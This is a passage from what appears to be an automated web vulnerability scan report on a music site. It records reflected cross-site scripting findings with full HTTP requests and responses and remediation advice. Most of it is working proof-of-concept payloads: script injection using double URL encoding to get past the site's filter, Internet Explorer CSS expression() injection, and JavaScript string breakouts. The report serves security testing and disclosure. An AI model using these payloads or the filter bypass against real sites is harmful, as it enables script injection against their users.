Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc1bf9';287a2412129';
   s.prop4 = 'grinderman';
   s.prop5 = 'worm-tamer';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.59. http://bigpondmusic.com/album/grinderman/worm-tamer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e was submitted in the REST URL parameter 1. This input was echoed as 95602"><script>alert(1)</script>bd7e35b9c6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e/grinderman/worm-tamer HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album95602"><script>alert(1)</script>bd7e35b9c6e/grinderman/worm-tamer" />
...[SNIP]...

2.60. http://bigpondmusic.com/album/grinderman/worm-tamer [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2673"style%3d"x%3aexpression(alert(1))"545b5603757 was submitted in the h parameter. This input was echoed as d2673"style="x:expression(alert(1))"545b5603757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/grinderman/worm-tamer?h=764552781d2673"style%3d"x%3aexpression(alert(1))"545b5603757 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 106667


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Grinderman - Worm Tamer - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/grinderman/worm-tamer?h=764552781d2673"style="x:expression(alert(1))"545b5603757" />
...[SNIP]...

2.61. http://bigpondmusic.com/album/grinderman/worm-tamer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f27a"style="x:expression(alert(1))"0807d081f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/grinderman/worm-tamer?6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 106658


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Grinderman - Worm Tamer - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/grinderman/worm-tamer?6f27a"style="x:expression(alert(1))"0807d081f23=1" />
...[SNIP]...

2.62. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba08d'%3b1e196c98b41 was submitted in the REST URL parameter 1. This input was echoed as ba08d';1e196c98b41 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumba08d'%3b1e196c98b41/guy-sebastian/twenty-ten/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumba08d';1e196c98b41';
   s.prop4 = 'guy-sebastian';
   s.prop5 = 'twenty-ten';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.63. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85 was submitted in the REST URL parameter 1. This input was echoed as e3ae8"><script>alert(1)</script>70c377bcd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Validation alone is not the fix, though: the response below shows the value written into the parentUrl hidden input with its double quote unencoded, so the value must be HTML-attribute-encoded at the point where it is emitted, regardless of what the filter accepts.

Request

GET /albume3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85/guy-sebastian/twenty-ten/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albume3ae8"><script>alert(1)</script>70c377bcd85/guy-sebastian/twenty-ten/" />
...[SNIP]...

2.64. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b was submitted in the cid parameter. This input was echoed as 75d86"style="x:expression(alert(1))"8fb9c4a702b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and disabled in its later standards modes), so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that closes the value attribute of the parentUrl hidden input and lets the attacker supply further attributes, is browser-independent and is not limited to the style attribute.

Request

GET /album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 148108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian - Twenty Ten -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style="x:expression(alert(1))"8fb9c4a702b" />
...[SNIP]...

2.65. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d1b"style%3d"x%3aexpression(alert(1))"2964101664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3d1b"style="x:expression(alert(1))"2964101664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and disabled in its later standards modes), so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that closes the value attribute of the parentUrl hidden input and lets the attacker supply further attributes, is browser-independent and is not limited to the style attribute.

Request

GET /album/guy-sebastian/twenty-ten/?d3d1b"style%3d"x%3aexpression(alert(1))"2964101664=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 148112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian - Twenty Ten -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?d3d1b"style="x:expression(alert(1))"2964101664=1" />
...[SNIP]...

2.66. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b was submitted in the REST URL parameter 1. This input was echoed as 74bc7"><script>alert(1)</script>3d6147d7b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Validation alone is not the fix, though: the response below shows the value written into the parentUrl hidden input with its double quote unencoded, so the value must be HTML-attribute-encoded at the point where it is emitted, regardless of what the filter accepts.

Request

GET /album74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b/james-blunt/some-kind-of-trouble HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87993


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album74bc7"><script>alert(1)</script>3d6147d7b3b/james-blunt/some-kind-of-trouble" />
...[SNIP]...

2.67. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e73c'%3bae196294df9 was submitted in the REST URL parameter 1. This input was echoed as 4e73c';ae196294df9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. The response below shows the reflection point: the s.channel assignment in the inline analytics script, where the single quote and the semicolon both arrive unencoded, so the literal is closed early and whatever follows it is parsed as JavaScript. The 404 sitemap page still populates that block from the URL segments, so the reflection does not depend on a valid album route. The scanner could not turn this into a full proof-of-concept for injecting arbitrary JavaScript, which usually means a further character the payload needs is filtered or encoded; examine the application's behaviour manually to identify the input validation or other obstacle in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be escaped for a JavaScript string literal before it is written out (hex- or unicode-escape every character outside [A-Za-z0-9], so that quotes, backslashes, line terminators and the sequence </script> cannot appear in the emitted script). HTML entity encoding is the wrong tool here, since entities are not decoded inside a script block.

Request

GET /album4e73c'%3bae196294df9/james-blunt/some-kind-of-trouble HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4e73c';ae196294df9';
   s.prop4 = 'james-blunt';
   s.prop5 = 'some-kind-of-trouble';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' +
...[SNIP]...

2.68. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 804a1"style="x:expression(alert(1))"cc0e770a23b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and disabled in its later standards modes), so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that closes the value attribute of the parentUrl hidden input and lets the attacker supply further attributes, is browser-independent and is not limited to the style attribute.

Request

GET /album/james-blunt/some-kind-of-trouble?804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>James Blunt - Some Kind Of T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble?804a1"style="x:expression(alert(1))"cc0e770a23b=1" />
...[SNIP]...

2.69. http://bigpondmusic.com/album/jebediah/lost-my-nerve [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154 was submitted in the REST URL parameter 1. This input was echoed as 8a220"><script>alert(1)</script>30cfeaa9154 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Validation alone is not the fix, though: the response below shows the value written into the parentUrl hidden input with its double quote unencoded, so the value must be HTML-attribute-encoded at the point where it is emitted, regardless of what the filter accepts.

Request

GET /album8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154/jebediah/lost-my-nerve HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
